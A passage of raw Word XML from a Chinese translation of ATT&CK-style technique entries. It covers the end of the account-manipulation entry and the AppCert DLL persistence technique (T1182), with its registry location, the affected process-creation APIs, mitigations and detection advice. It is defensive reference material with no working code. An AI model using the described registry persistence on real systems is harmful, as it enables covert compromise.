        <w:t>某些权限级别。账号操纵可以包括修改权限，修改凭据，添加或更改权限组，修改账号设置或修改身份认证的执行方式。这些操作还可以包括旨在破坏安全策略的账号活动，例如执行迭代密码更新以破坏密码时长策略并保留所盗凭据的生命周期。攻击者必须拥有对系统或域的足够权限才能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>创建或操纵账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC2548" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00E65C70" w14:paraId="776139D8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="372F2C60" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E65C70" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65C70">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="27C62409" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E65C70" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65C70">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4EF4EB21" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67F505BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>多因子认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DE9D749" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对用户和特权账号使用多因子认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0CEDB603" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24ED2223" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="384367B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置访问控制和防火墙来限制对关键系统和域控制器的访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5A21FA1F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166C5A39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId40" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55CDFAF9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过确保关键服务器的适当安全配置来保护域控制器，从而限制使用可能不必要的协议和服务（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件共享）进行访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="48F17334" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64856508" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId41" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C81C1B7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不允许将域管理员账号用于日常操作，因为这些操作可能会将域管理员账号暴露给非特权系统上的潜在攻击者。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71DD771E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582FA2F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B113B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集系统和域中账号对象修改相关的事件，例如事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4738</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。监控与其他可疑活动相关的账号修改。修改可能发生在不寻常的时间或来自不寻常的系统。特别是主题和目标账号不同的标记事件或包含其它多余标记的事件，例如在不知道旧密码的情况下更改密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020CCD1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>凭据也可能在不寻常的时间使用或在不寻常的系统或服务使用，并可能与其他可疑活动有关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E333C" w14:textId="07D2C391" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AppCert</w:t>
      </w:r>
      <w:r w:rsidR="00C16140">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="49E5A24A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E05F50" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1182</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB543B9" w14:textId="3E565B84" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77F3EADE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63863E9B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="301CB92B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F87FEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>已</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>加载动态链接库，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5050E172" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="098FBC7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3EC573" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在注册表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppCertDLLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值中指定的动态链接库被加载到调用以下常用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的每个进程中：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CreateProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateProcessAsUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateProcessWithLoginW </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CreateProcessWithTokenW</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0529B5E8" w14:textId="7DA2F357" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与进程注入类似，攻击者可能会滥用此值</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>在计算机</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单独</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>进程的上下文中加载和运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动态库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，从而获得</w:t>
      </w:r>
      <w:r w:rsidR="008F7150">
        <w:t>持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和权限提升。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3432B0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="544A86F7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6989669F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5732D60D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0E4366AF" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A288E31" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId42" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E3CD30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者会安装新的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppCertDLL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件来执行此技术。使用应用白名单工具（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Defender </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Application Control</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppLocker</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或软件限制策略）来识别并阻止通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppCertDLL</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>功能执行的潜在恶意软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AC6FC8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED370CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B88E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程加载的动态链接库，尤其是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找未识别的或未正常加载到进程的动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF8EEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppCertDLLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表值来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知软件、补丁周期等无关的修改。监控和分析表示编辑了注册表的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RegCreateKeyEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
